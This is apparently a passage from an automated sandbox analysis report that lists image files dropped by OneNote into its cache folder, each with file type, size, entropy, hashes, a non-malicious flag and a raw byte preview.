                                                                                                                                                                                                                  Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AF.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12180
                                                                                                                                                                                                                  Entropy (8bit):5.318266117301791
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                                                                                                                                  MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                                                                                                                                  SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                                                                                                                                  SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                                                                                                                                  SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AH.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2104
                                                                                                                                                                                                                  Entropy (8bit):7.252780160030615
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                                                                                                                                  MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                                                                                                                                  SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                                                                                                                                  SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                                                                                                                                  SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AJ.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14177
                                                                                                                                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AL.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):36740
                                                                                                                                                                                                                  Entropy (8bit):7.48266872907324
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                                                                                                                                  MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                                                                                                                                  SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                                                                                                                                  SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                                                                                                                                  SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AN.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):53259
                                                                                                                                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AP.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60924
                                                                                                                                                                                                                  Entropy (8bit):7.758472758205366
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                                                                                                                                  MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                                                                                                                                  SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                                                                                                                                  SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                                                                                                                                  SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AR.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):515
                                                                                                                                                                                                                  Entropy (8bit):6.740133870626016
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                                                                                                                                  MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                                                                                                                                  SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                                                                                                                                  SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                                                                                                                                  SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AT.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1547
                                                                                                                                                                                                                  Entropy (8bit):6.4194805172468286
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                                                                                                                                  MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                                                                                                                                  SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                                                                                                                                  SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                                                                                                                                  SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AV.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):95763
                                                                                                                                                                                                                  Entropy (8bit):7.931689087616878
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                                                                                                                                  MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                                                                                                                                  SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                                                                                                                                  SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                                                                                                                                  SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B1.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):67991
                                                                                                                                                                                                                  Entropy (8bit):7.870481231782746
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                                                                                                                                  MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                                                                                                                                  SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                                                                                                                                  SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                                                                                                                                  SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B3.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22203
                                                                                                                                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B5.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):15740
                                                                                                                                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B7.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):86187
                                                                                                                                                                                                                  Entropy (8bit):7.951356272886186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                                                                                                                                  MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                                                                                                                                  SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                                                                                                                                  SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                                                                                                                                  SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B9.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11197
                                                                                                                                                                                                                  Entropy (8bit):7.975073010774664
                                                                                                                                                                                                                  Encrypted:false
